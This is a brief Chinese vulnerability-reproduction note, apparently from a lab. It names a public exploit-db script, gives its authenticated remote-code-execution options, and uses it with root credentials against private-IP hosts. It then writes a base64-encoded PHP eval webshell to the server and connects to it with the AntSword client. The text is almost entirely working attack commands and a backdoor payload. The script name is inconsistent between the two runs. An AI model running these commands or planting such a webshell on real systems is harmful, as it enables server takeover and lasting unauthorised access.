搭建
漏洞复现
下载利用脚本:
https://www.exploit-db.com/exploits/40185
脚本利用方法:
-u 账号
-p 密码
-c 执行代码(php代码) 默认执行uname -a
python 40185.py -u root -p root http://192.168.154.3:8080
成功读取到文件
接下来写入木马
python .\CVE-2016-57.py -u root --pwd="root" http://192.168.1.101:8080 -c "file_put_contents('whh.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1Rbcm9vdF0pOz8+'));"
上蚁剑
连接成功